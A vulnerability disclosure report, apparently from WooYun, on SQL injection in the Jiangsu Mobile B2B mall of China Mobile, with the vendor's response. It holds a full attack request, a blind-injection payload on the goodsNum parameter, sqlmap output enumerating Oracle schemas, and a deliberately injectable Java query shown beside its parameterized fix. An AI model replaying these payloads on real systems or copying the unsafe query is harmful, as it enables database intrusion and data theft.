
Vulnerability Summary

Defect ID: wooyun-2015-0156025

Title: SQL injection on a China Mobile 10086.cn provincial site exposes a large amount of data

Vendor: China Mobile

Author: greg.wu

Submitted: 2015-11-26 14:36

Fixed: 2016-01-14 14:54

Published: 2016-01-14 14:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-26: details sent to the vendor; awaiting vendor handling
2015-11-30: vendor confirmed; details disclosed to the vendor only
2015-12-10: details disclosed to core white hats and relevant domain experts
2015-12-20: details disclosed to regular white hats
2015-12-30: details disclosed to intern white hats
2016-01-14: details disclosed to the public

Summary:

SQL injection on a China Mobile 10086.cn provincial site exposes a large amount of data

Details:

SQL injection in the Jiangsu Mobile B2B mall. The backend is an Oracle database, and sqlmap can be run against it directly.

POST /b2b/actionDispatcher.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/b2b/goods/UUPO-U8.jsp
Content-Length: 88
Cookie: bi-user-id=141309163362895; WT_FPC=id=2e40e16cec67a0884481414484686765:lv=1448563543832:ss=1448563522116; tK1gTQFA2C=MDAwM2IyYThiNjAwMDAwMDAwNjQwQXgvWR0xNDQ4NTM1ODk0; B2B_JSESSIONID=qqrCWW2hTSZvSpZydDDTS1GBYbpr1GN1Sn0h9gT01GR1ndY1vjcB!382508210; __utma=231257732.265260302.1448563524.1448563524.1448563524.1; __utmb=231257**.**.**.**8563524; __utmc=231257732; __utmz=231257732.1448563524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; fpyUjfj0NP=MDAwM2IyYThiNjAwMDAwMDAwMzIwVC9ACVkxNDQ4NTM1OTEz
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01&supplierNum=99100012


The goodsNum parameter is injectable.
PoC:
goodsNum=JSYD-LENOVO-A278T-01') AND 1363=1363 AND ('1'='1

Proof:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: goodsNum
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01') AND 1517=1517 AND ('cKNd'='cKNd&supplierNum=99100012
---
[02:49:10] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP 2.2, Nginx
back-end DBMS: Oracle
[02:49:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:49:10] [INFO] fetching database (schema) names
[02:49:10] [INFO] fetching number of databases
[02:49:10] [INFO] resumed: 4
[02:49:10] [INFO] resumed: KFZXBTB
[02:49:10] [INFO] resumed: SYS
[02:49:10] [INFO] resumed: SYSTEM
[02:49:10] [INFO] resumed: TSMS1
available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
The current database has 659 tables, 8 of which contain a password column.
web application technology: Servlet 3.0, JSP 2.2, Nginx
back-end DBMS: Oracle
[03:02:38] [INFO] fetching tables for database: 'KFZXBTB'
[03:02:38] [INFO] fetching number of tables for database 'KFZXBTB'
[03:02:38] [INFO] retrieved: 659

Remediation:

Filter the input and use parameterized queries.

Copyright: please credit greg.wu@WooYun when reposting.
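As an added illustration of the remediation (not code from the report or from the site itself), the following JDBC snippet shows the concatenation pattern that makes goodsNum injectable beside its parameterized form, since the site runs Servlet/JSP on Oracle; the table name, column names and the expected product-code format are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.regex.Pattern;

/** Price lookup for the goodsDetailPrice action. Table and column names are assumed. */
public class GoodsPriceDao {
    private static final String SQL_TEMPLATE =
        "SELECT price FROM goods_price WHERE (goods_num = ?) AND supplier_num = ?";

    // Assumed shape of a product code such as JSYD-LENOVO-A278T-01: upper-case letters,
    // digits and hyphens only, so a quote or parenthesis is rejected before any query runs.
    private static final Pattern GOODS_NUM = Pattern.compile("[A-Z0-9-]{1,40}");

    /** Vulnerable form: request parameters are pasted into the SQL text. A goodsNum that
     *  closes the quote and parenthesis rewrites the WHERE clause, which is exactly what
     *  the boolean-based blind payload in the report relies on. */
    static String buildUnsafeSql(String goodsNum, String supplierNum) {
        return "SELECT price FROM goods_price WHERE (goods_num = '" + goodsNum
             + "') AND supplier_num = '" + supplierNum + "'";
    }

    static ResultSet priceUnsafe(Connection conn, String goodsNum, String supplierNum)
            throws SQLException {
        Statement st = conn.createStatement();
        return st.executeQuery(buildUnsafeSql(goodsNum, supplierNum));
    }

    /** Hardened form: the SQL text is constant and the values travel as bind variables,
     *  so Oracle never parses user input as part of the statement. The format check is a
     *  second layer; the bind variables alone already prevent the injection. */
    static ResultSet priceSafe(Connection conn, String goodsNum, String supplierNum)
            throws SQLException {
        if (!isWellFormed(goodsNum)) {
            throw new IllegalArgumentException("malformed goodsNum");
        }
        PreparedStatement ps = conn.prepareStatement(SQL_TEMPLATE);
        ps.setString(1, goodsNum);
        ps.setString(2, supplierNum);
        return ps.executeQuery();
    }

    static boolean isWellFormed(String goodsNum) {
        return goodsNum != null && GOODS_NUM.matcher(goodsNum).matches();
    }
}
```

Rejected goodsNum values are also worth logging on the server side, since a request that fails the format check is a cheap detection signal for scanner activity against this endpoint.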


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-30 14:53

Vendor reply:

CNVD has confirmed and reproduced the described issue and has forwarded it via CNCERT to China Mobile Group, which will coordinate handling with the site's administration department.

Latest status:

None yet

